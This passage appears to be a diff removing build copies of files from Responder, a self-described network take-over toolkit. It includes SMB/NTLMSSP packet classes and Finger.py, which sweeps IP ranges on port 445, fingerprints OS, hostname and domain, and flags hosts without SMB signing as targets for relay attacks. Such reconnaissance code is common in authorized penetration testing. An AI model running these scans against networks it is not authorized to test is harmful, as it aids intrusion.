data1 = str(self.fields["Server"])+str(self.fields["HeadLen"])+str(self.fields["CreditCharge"])+str(self.fields["NTStatus"])+str(self.fields["SMBv2Command"])+str(self.fields["CreditRequested"])+str(self.fields["Flags"])+str(self.fields["ChainOffset"])+str(self.fields["CommandSequence"])+str(self.fields["ProcessID"])+str(self.fields["TreeID"])+str(self.fields["SessionID"])+str(self.fields["Signature"])
self.fields["HeadLen"] = StructWithLenPython2or3("<h", len(data1))
class SMBv2Negotiate(Packet):
fields = OrderedDict([
("Len", "\x24\x00"),
("DialectCount", "\x02\x00"),
("SecurityMode", "\x01\x00"),
("Reserved","\x00\x00"),
("Capabilities","\x00\x00\x00\x00"),
("ClientGUID", urandom(16).decode('latin-1')),
("ClientStartTime","\x00\x00\x00\x00\x00\x00\x00\x00"),
("Dialect1","\x02\x02"),
("Dialect2","\x10\x02"),
])
def calculate(self):
data1 = str(self.fields["Len"])+str(self.fields["DialectCount"])+str(self.fields["SecurityMode"])+str(self.fields["Reserved"])+str(self.fields["Capabilities"])+str(self.fields["ClientGUID"])+str(self.fields["ClientStartTime"])
self.fields["Len"] = StructWithLenPython2or3("<h", len(data1))
class SMBv2Session1(Packet):
fields = OrderedDict([
("Len", "\x19\x00"),
("VCNumber", "\x00"),
("SecurityMode", "\x01"),
("Capabilities","\x01\x00\x00\x00"),
("Channel","\x00\x00\x00\x00"),
("SecurityBufferOffset","\x58\x00"),
("SecurityBufferLen","\x4a\x00"),
("PreviousSessionId","\x00\x00\x00\x00\x00\x00\x00\x00"),
("ApplicationHeaderTag","\x60"),
("ApplicationHeaderLen","\x48"),
("AsnSecMechType","\x06"),
("AsnSecMechLen","\x06"),
("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
("ChoosedTag","\xa0"),
("ChoosedTagStrLen","\x3e"),
("NegTokenInitSeqHeadTag","\x30"),
("NegTokenInitSeqHeadLen","\x3c"),
("NegTokenInitSeqHeadTag1","\xA0"),
("NegTokenInitSeqHeadLen1","\x0e"),
("NegTokenInitSeqNLMPTag","\x30"),
("NegTokenInitSeqNLMPLen","\x0c"),
("NegTokenInitSeqNLMPTag1","\x06"),
("NegTokenInitSeqNLMPTag1Len","\x0a"),
("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenInitSeqNLMPTag2","\xa2"),
("NegTokenInitSeqNLMPTag2Len","\xa2"),
("NegTokenInitSeqNLMPTag2Octet","\x04"),
("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
("NegTokenInitSeqMechSignature","\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
("NegTokenInitSeqMechMessageType","\x01\x00\x00\x00"),
("NegTokenInitSeqMechMessageFlags","\x97\x82\x08\xe2"),
("NegTokenInitSeqMechMessageDomainNameLen","\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameMaxLen","\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameBuffOffset","\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameLen","\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameMaxLen","\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameBuffOffset","\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh","\x06"),
("NegTokenInitSeqMechMessageVersionLow","\x01"),
("NegTokenInitSeqMechMessageVersionBuilt","\xB1\x1D"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
])
def calculate(self):
data1 = str(self.fields["Len"])+str(self.fields["VCNumber"])+str(self.fields["SecurityMode"])+str(self.fields["Capabilities"])+str(self.fields["Channel"])+str(self.fields["SecurityBufferOffset"])+str(self.fields["SecurityBufferLen"])+str(self.fields["PreviousSessionId"])
data2 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data3 = str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data4 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data5 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data6 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data7 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data8 = str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
#Buff Offset
self.fields["SecurityBufferOffset"] = StructWithLenPython2or3("<h", len(data1)+64)
##Buff Len
self.fields["SecurityBufferLen"] = StructWithLenPython2or3("<h", len(data2))
##App Header
self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3("<B", len(data3))
##Asn Field 1
self.fields["AsnSecMechLen"] = StructWithLenPython2or3("<B", len(str(self.fields["AsnSecMechStr"])))
##Asn Field 1
self.fields["ChoosedTagStrLen"] = StructWithLenPython2or3("<B", len(data4))
##SpNegoTokenLen
self.fields["NegTokenInitSeqHeadLen"] = StructWithLenPython2or3("<B", len(data5))
##NegoTokenInitcodecs.decode(RandomStr,'hex')
self.fields["NegTokenInitSeqHeadLen1"] = StructWithLenPython2or3("<B", len(str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
## Tag0 Len
self.fields["NegTokenInitSeqNLMPLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
## Tag0 Str Len
self.fields["NegTokenInitSeqNLMPTag1Len"] = StructWithLenPython2or3("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
## Tag2 Len
self.fields["NegTokenInitSeqNLMPTag2Len"] = StructWithLenPython2or3("<B", len(data7))
## Tag3 Len
self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = StructWithLenPython2or3("<B", len(data8))

374
build/lib/Responder/tools/SMBFinger/Finger.py
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@ -1,374 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re,sys,socket,struct
import multiprocessing
from socket import *
from time import sleep
from .odict import OrderedDict
__version__ = "0.7"
Timeout = 2
class Packet():
fields = OrderedDict([
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in list(kw.items()):
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, list(self.fields.values())))
#Python version
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
SMB1 = "Enabled"
def StructWithLenPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, data)
#Python3...
else:
return struct.pack(endian, data).decode('latin-1')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
def longueur(payload):
length = StructWithLenPython2or3(">i", len(''.join(payload)))
return length
class SMBHeader(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
class SMBSessionFingerData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00" ),
("andxoffset", "\x00\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x4a\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1","\xb1\x00"),
("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])
##Now Lanman
class SMBHeaderLanMan(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("flag1", "\x08"),
("flag2", "\x01\xc8"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x3c\x1b"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
])
#We grab the domain and hostname from the negotiate protocol answer, since it is in a Lanman dialect format.
class SMBNegoDataLanMan(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x0c\x00"),
("BuffType","\x02"),
("Dialect", "NT LM 0.12\x00"),
])
#####################
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def IsSigningEnabled(data):
if data[39:40] == b"\x0f":
return True
else:
return False
def atod(a):
return struct.unpack("!L",inet_aton(a))[0]
def dtoa(d):
return inet_ntoa(struct.pack("!L", d))
def GetBootTime(data):
try:
Filetime = int(struct.unpack('<q',data)[0])
t = divmod(Filetime - 116444736000000000, 10000000)
time = datetime.datetime.fromtimestamp(t[0])
return time, time.strftime('%Y-%m-%d %H:%M:%S')
except:
pass
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45].encode('latin-1'))[0]
if length > 255:
OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
if length <= 255:
OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[46+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
try:
data = NetworkRecvBufferPython2or3(data)
DomainJoined, Hostname = tuple([e.replace("\x00", "") for e in data[81:].split('\x00\x00\x00')[:2]])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '':
DomainJoined = data[81:110].decode('latin-1')
Hostname = data[113:].decode('latin-1')
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host):
global SMB1
try:
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(0.7)
s.connect(Host)
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
n = SMBNegoDataLanMan()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
s.close()
if data[8:10] == b'\x72\x00':
return GetHostnameAndDomainName(data)
except IOError as e:
if e.errno == errno.ECONNRESET:
SMB1 = "Disabled"
p("SMB1 is disabled on this host. Please choose another host.")
else:
return False
def SmbFinger(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
pass
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer0))
data = s.recv(2048)
signing = IsSigningEnabled(data)
if data[8:10] == b'\x72\x00':
head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
t = SMBSessionFingerData()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
if data[8:10] == b'\x73\x16':
OsVersion, ClientVersion = OsNameClientVersion(NetworkRecvBufferPython2or3(data))
return signing, OsVersion, ClientVersion
except:
pass
def SmbFingerSigning(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect((Host, 445))
except:
return False
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(Data = SMBNegoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
data = s.recv(2048)
signing = IsSigningEnabled(data)
return signing
except:
pass
##################
#run it
def ShowResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
return False
try:
Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
disabled = color("SMB signing: False", 2, 1)
print(color("Retrieving information for %s..."%Host[0], 8, 1))
print(enabled if Signing else disabled)
print(color("Os version: '%s'"%(OsVer), 8, 3))
print(color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3))
except:
pass
def ShowSmallResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
return False
try:
Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
Message = color("\n[+] Client info: ['%s', domain: '%s', signing:'%s']"%(OsVer, DomainJoined, Signing),4,0)
return Message
except:
return None
def ShowScanSmallResults(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect(Host)
except:
return False
try:
Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
print(Message)
except:
return None
def ShowSigning(Host):
s = socket(AF_INET, SOCK_STREAM)
try:
s.settimeout(Timeout)
s.connect((Host, 445))
except:
print("[Pivot Verification Failed]: Target host is down")
return True
try:
Signing = SmbFingerSigning(Host)
if Signing == True:
print("[Pivot Verification Failed]:Signing is enabled. Choose another host.")
return True
else:
return False
except:
pass
def RunFinger(Host):
m = re.search("/", str(Host))
if m :
net,_,mask = Host.partition('/')
mask = int(mask)
net = atod(net)
for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
ShowResults((host,445))
else:
ShowResults((Host,445))
def RunPivotScan(Host, CurrentIP):
m = re.search("/", str(Host))
if m :
net,_,mask = Host.partition('/')
mask = int(mask)
net = atod(net)
threads = []
for host in (dtoa(net+n) for n in range(0, 1<<32-mask)):
if CurrentIP == host:
pass
else:
p = multiprocessing.Process(target=ShowScanSmallResults, args=((host,445),))
threads.append(p)
p.start()
sleep(1)
else:
ShowScanSmallResults((Host,445))

0
build/lib/Responder/tools/SMBFinger/__init__.py
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124
build/lib/Responder/tools/SMBFinger/odict.py
View file

@ -1,124 +0,0 @@
import sys
try:
from UserDict import DictMixin
except ImportError:
from collections import UserDict
try:
from collections import MutableMapping as DictMixin
except ImportError:
from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = next(reversed(self))
else:
key = next(iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
if sys.version_info >= (3, 0):
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.keys
itervalues = DictMixin.values
iteritems = DictMixin.items
else:
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(list(self.items()), list(other.items())))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
if __name__ == '__main__':
d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

124
build/lib/Responder/tools/odict.py
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@ -1,124 +0,0 @@
import sys
try:
from UserDict import DictMixin
except ImportError:
from collections import UserDict
try:
from collections import MutableMapping as DictMixin
except ImportError:
from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
